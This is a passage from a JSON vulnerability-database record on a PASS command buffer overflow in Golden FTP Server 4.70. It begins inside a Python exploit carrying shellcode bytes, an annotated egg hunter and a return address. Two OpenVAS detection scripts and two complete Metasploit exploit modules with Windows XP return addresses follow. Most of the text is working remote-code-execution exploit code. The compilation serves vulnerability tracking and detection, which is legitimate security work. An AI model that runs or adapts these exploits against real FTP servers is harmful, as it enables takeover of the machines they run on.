+= b\"\\x78\\x72\\x02\\xa5\\xb9\\x7d\\x8b\\x28\\x85\\x59\\x9b\\xf4\\x06\"\r\nbuf += b\"\\xe6\\xcf\\xa8\\x50\\xb0\\xb9\\x0e\\x0b\\x72\\x13\\xd9\\xe0\\xdc\"\r\nbuf += b\"\\xf3\\x9c\\xca\\xde\\x85\\xa0\\x06\\xa9\\x69\\x10\\xff\\xec\\x96\"\r\nbuf += b\"\\x9d\\x97\\xf8\\xef\\xc3\\x07\\x06\\x3a\\x40\\x37\\x4d\\x66\\xe1\"\r\nbuf += b\"\\xd0\\x08\\xf3\\xb3\\xbc\\xaa\\x2e\\xf7\\xb8\\x28\\xda\\x88\\x3e\"\r\nbuf += b\"\\x30\\xaf\\x8d\\x7b\\xf6\\x5c\\xfc\\x14\\x93\\x62\\x53\\x14\\xb6\"\r\n\r\ntotal_length = 545-len(SOURCE)\r\neip = b'\\x7f\\x79\\x4c\\x00'\r\nhunter = b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset base on source ip\r\nhunter += b'\\xfd' # std ; set df flag so we search high to low\r\nhunter += b'\\xb8\\x43\\x42\\x41\\x40' # mov eax, 0x40414243 ; egg\r\nhunter += b'\\x89\\xF7' # mov edi, esi ; start searching from esi\r\nhunter += b'\\x47' # inc edi\r\nhunter += b'\\x90' # nop\r\nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3 ; scasd decrements by 4, add 3 so we search 1 by 1\r\nhunter += b'\\xaf' # scasd ; check for egg at edi\r\nhunter += b'\\x75\\xfa' # short jnz -0x6 ; jump back to add edi, 0x3\r\nhunter += b'\\x83\\xC7\\x03' # add edi, 0x3\r\nhunter += b'\\xaf' # scasd\r\nhunter += b'\\x75\\xfa' # short jnz -0x6\r\nhunter += b'\\x83\\xC7\\x1f' # add edi, 0x1f ; account for egg hunter\r\nhunter += b'\\xff\\xe7' # jmp edi ; egg found, let's go!\r\nhunter += b'\\x90\\x90\\x90\\x90\\x90\\x90' # padding ; nop slide to account for variable offset again\r\n\r\npayload = hunter + buf + b'\\x90'*(total_length-len(eip)-len(hunter)-len(buf)) + eip\r\n\r\ns.send(b'USER anonymous\\r\\n')\r\nprint(s.recv(1024))\r\nprint(s.recv(1024))\r\ns.send(b'PASS ' + payload + b'\\r\\n')\r\nprint(s.recv(1024))\r\ns.send(b'QUIT\\r\\n')\r\nprint(s.recv(1024))", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://www.exploit-db.com/download/49629"}], "osvdb": [{"lastseen": "2017-04-28T13:20:32", "bulletinFamily": "software", "cvelist": ["CVE-2006-6576"], "description": "# No description provided by the source\n\n## References:\n[Secunia Advisory ID:23323](https://secuniaresearch.flexerasoftware.com/advisories/23323/)\nOther Advisory URL: http://retrogod.altervista.org/golden_heap.html\nFrSIRT Advisory: ADV-2006-4936\n[CVE-2006-6576](https://vulners.com/cve/CVE-2006-6576)\n", "edition": 1, "modified": "2006-12-03T22:57:18", "published": "2006-12-03T22:57:18", "href": "https://vulners.com/osvdb/OSVDB:35951", "id": "OSVDB:35951", "title": "Golden FTP Server PASS Command Overflow", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "openvas": [{"lastseen": "2020-03-26T19:11:24", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6576"], "description": "The host is running Golden FTP Server and is prone to buffer\n overflow vulnerability.", "modified": "2020-03-24T00:00:00", "published": "2011-06-13T00:00:00", "id": "OPENVAS:1361412562310802024", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310802024", "type": "openvas", "title": "Golden FTP PASS Command Buffer Overflow Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Golden FTP PASS Command Buffer Overflow Vulnerability\n#\n# Authors:\n# Veerendra G.G <veernedragg@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.802024\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-06-13 15:28:04 +0200 (Mon, 13 Jun 2011)\");\n script_cve_id(\"CVE-2006-6576\");\n script_bugtraq_id(45957, 45924);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Golden FTP PASS Command Buffer Overflow Vulnerability\");\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_family(\"FTP\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/golden_tfp/detected\");\n\n script_xref(name:\"URL\", value:\"http://secunia.com/advisories/23323\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/17355\");\n script_xref(name:\"URL\", value:\"http://www.exploit-db.com/exploits/16036\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute\n arbitrary code on the system or cause the application to crash.\");\n\n script_tag(name:\"affected\", value:\"Golden FTP Server Version 4.70, other versions may also be\n affected.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to format string error while parsing 'PASS'\n command, which can be exploited to crash the FTP service by sending 'PASS'\n command with an overly long username parameter.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer\n release, disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"summary\", value:\"The host is running Golden FTP Server and is prone to buffer\n overflow vulnerability.\");\n\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\n\nftpPort = ftp_get_port(default:21);\nbanner = ftp_get_banner(port:ftpPort);\nif(!banner || \"Golden FTP Server\" >!< banner){\n exit(0);\n}\n\nsoc = open_sock_tcp(ftpPort);\nif(!soc) {\n exit(0);\n}\n\nresp = ftp_recv_line(socket:soc);\nif(!resp || \"220 Golden FTP Server\" >!< resp){\n ftp_close(socket:soc);\n exit(0);\n}\n\nuser_cmd = string(\"USER Anonymous\", \"\\r\\n\");\nsend(socket:soc, data:user_cmd);\nresp = recv_line(socket:soc, length:260);\n\npass_cmd = string(\"PASS \" , crap(data:'A', length:500) , \"\\r\\n\");\nsend(socket:soc, data:pass_cmd);\nresp = recv_line(socket:soc, length:260);\n\nftp_close(socket:soc);\n\nsleep(1);\n\nsoc1 = open_sock_tcp(ftpPort);\nif(!soc1) {\n security_message(port:ftpPort);\n exit(0);\n}\n\nresp = ftp_recv_line(socket:soc);\nif(!resp || \"220 Golden FTP Server\" >!< resp){\n security_message(port:ftpPort);\n}\n\nftp_close(socket:soc1);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-26T19:11:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2006-6576"], "description": "Golden FTP Server is prone to a denial-of-service vulnerability.", "modified": "2020-03-24T00:00:00", "published": "2011-01-20T00:00:00", "id": "OPENVAS:1361412562310103037", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103037", "type": "openvas", "title": "Golden FTP Server Malformed Message Denial Of Service Vulnerability", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Golden FTP Server Malformed Message Denial Of Service Vulnerability\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (C) 2011 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103037\");\n script_version(\"2020-03-24T12:27:11+0000\");\n script_tag(name:\"last_modification\", value:\"2020-03-24 12:27:11 +0000 (Tue, 24 Mar 2020)\");\n script_tag(name:\"creation_date\", value:\"2011-01-20 13:02:23 +0100 (Thu, 20 Jan 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-2006-6576\");\n script_bugtraq_id(45924);\n script_name(\"Golden FTP Server Malformed Message Denial Of Service Vulnerability\");\n script_category(ACT_GATHER_INFO);\n script_family(\"FTP\");\n script_copyright(\"Copyright (C) 2011 Greenbone Networks GmbH\");\n script_dependencies(\"ftpserver_detect_type_nd_version.nasl\");\n script_require_ports(\"Services/ftp\", 21);\n script_mandatory_keys(\"ftp/golden_tfp/detected\");\n\n script_xref(name:\"URL\", value:\"https://www.securityfocus.com/bid/45924\");\n script_xref(name:\"URL\", value:\"http://www.mediafire.com/?jej19gc93zjbiyu\");\n\n script_tag(name:\"summary\", value:\"Golden FTP Server is prone to a denial-of-service vulnerability.\");\n\n script_tag(name:\"impact\", value:\"Exploits will cause the application to crash, denying service to\n legitimate users.\");\n\n script_tag(name:\"affected\", value:\"Golden FTP Server 4.70 is vulnerable. Other versions may also\n be affected.\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure\n of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release,\n disable respective features, remove the product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n exit(0);\n}\n\ninclude(\"ftp_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"version_func.inc\");\n\nport = ftp_get_port( default:21 );\nbanner = ftp_get_banner( port:port );\nif( ! banner || \"Golden FTP\" >!< banner )\n exit( 0 );\n\nversion = eregmatch( pattern:\"Golden FTP Server ready v([0-9.]+)\", string:banner );\n\nif( ! isnull( version[1] ) ) {\n if( version_is_less_equal( version:version[1], test_version:\"4.70\" ) ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:43", "description": "", "published": "2011-06-03T00:00:00", "type": "packetstorm", "title": "GoldenFTP PASS Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2011-06-03T00:00:00", "id": "PACKETSTORM:101952", "href": "https://packetstormsecurity.com/files/101952/GoldenFTP-PASS-Stack-Buffer-Overflow.html", "sourceData": "`# \n# $Id: goldenftp_pass_bof.rb 12816 2011-06-02 12:24:25Z swtornio $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::Remote::Ftp \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'GoldenFTP PASS Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits a vulnerability in the Golden \nFTP service. This module uses the PASS command to trigger the overflow. \n}, \n'Author' => [ 'bannedit' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 12816 $', \n'References' => \n[ \n[ 'CVE', '2006-6576'], \n[ 'OSVDB', '35951'], \n[ 'BID', '45957 '], \n[ 'URL', 'http://www.exploit-db.com/exploits/16036/'], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'seh', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 350, \n'BadChars' => \"\\x00\\x0a\\x0d\", \n}, \n'Platform' => ['win'], \n'Targets' => \n[ \n[ \n'Golden FTP 4.70 Universal', # Tested OK - bannedit 05/31/2011 \n{ \n'Platform' => 'win', \n'Ret' => 0x00a93ca6, \n}, \n] \n \n], \n'DisclosureDate' => 'Jan 23 2011')) \nend \n \ndef check \nconnect \ndisconnect \nprint_status(\"FTP Banner: #{banner}\".strip) \nif banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\" \nreturn Exploit::CheckCode::Appears \nelse \nreturn Exploit::CheckCode::Safe \nend \nend \n \ndef exploit \nif datastore['RHOST'].length < 15 \npad = make_nops(1) * (15 - datastore['RHOST'].length) \nend \n \nsploit = make_nops(4) * 38 \nsploit << payload.encoded \nsploit << pad \nsploit << make_nops(1) * (528 - sploit.length) \nsploit << [target.ret].pack('V') \n \nprint_status(\"Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}\") \nbegin \nconnect \nsend_user(\"anonymous\") \nsend_cmd(['PASS', sploit], false) \nhandler \nrescue EOFError \nend \nend \nend \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101952/goldenftp_pass_bof.rb.txt"}], "metasploit": [{"lastseen": "2020-08-21T23:58:58", "description": "This module exploits a vulnerability in the Golden FTP service, using the PASS command to cause a buffer overflow. Please note that in order trigger the vulnerable code, the victim machine must have the \"Show new connections\" setting enabled. By default, this option is unchecked.\n", "published": "2011-06-02T01:10:22", "type": "metasploit", "title": "GoldenFTP PASS Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2006-6576"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/WINDOWS/FTP/GOLDENFTP_PASS_BOF", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::Remote::Ftp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'GoldenFTP PASS Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits a vulnerability in the Golden FTP service, using the PASS\n command to cause a buffer overflow. Please note that in order trigger the vulnerable\n code, the victim machine must have the \"Show new connections\" setting enabled. By\n default, this option is unchecked.\n },\n 'Author' =>\n [\n 'Craig Freyman', #Initial poc on exploit-db with iglesiasgg\n 'bannedit', #Initial msf module\n 'Joff Thyer <jsthyer[at]gmail.com>', #Improved msf version\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2006-6576'],\n [ 'OSVDB', '35951'],\n [ 'BID', '45957'],\n [ 'EDB', '16036'],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'seh',\n },\n 'Privileged' => false,\n 'Payload' =>\n {\n 'Space' => 440,\n 'BadChars' => \"\\x00\\x0a\\x0d\",\n },\n 'Platform' => ['win'],\n 'Targets' =>\n [\n [ 'Windows XP Pro SP3', { 'Ret' => 0x7E45AE4E, } ], #JMP ESI USER32.dll\n [ 'Windows XP Pro SP2', { 'Ret' => 0x77D4E23B, } ], #JMP ESI USER32.dll\n [ 'Windows XP Pro SP0/SP1', { 'Ret' => 0x77e8157b, } ] #JMP ESI kernel32.dll\n ],\n 'DisclosureDate' => 'Jan 23 2011'))\n end\n\n def check\n connect\n disconnect\n vprint_status(\"FTP Banner: #{banner}\".strip)\n if banner =~ /Golden FTP Server ready v(4\\.\\d{2})/ and $1 == \"4.70\"\n return Exploit::CheckCode::Appears\n else\n return Exploit::CheckCode::Safe\n end\n end\n\n def exploit\n shortjmp = make_nops(3) + \"\\xeb\\x20\"\n nopsled = make_nops(1) * 60\n srciplen = Rex::Socket.source_address.length\n padding = make_nops(1) * (533 - (srciplen + nopsled.length + payload.encoded.length))\n\n sploit = nopsled\n sploit << payload.encoded\n sploit << padding\n sploit << [target.ret].pack('V')\n\n print_status(\"Connecting to #{datastore['RHOST']}:#{datastore['RPORT']}\")\n\n connect\n raw_send(shortjmp + \"\\n\")\n send_user(datastore['FTPUSER'])\n send_cmd(['PASS', sploit], false)\n select(nil,nil,nil,2)\n handler\n disconnect\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/ftp/goldenftp_pass_bof.rb"}]}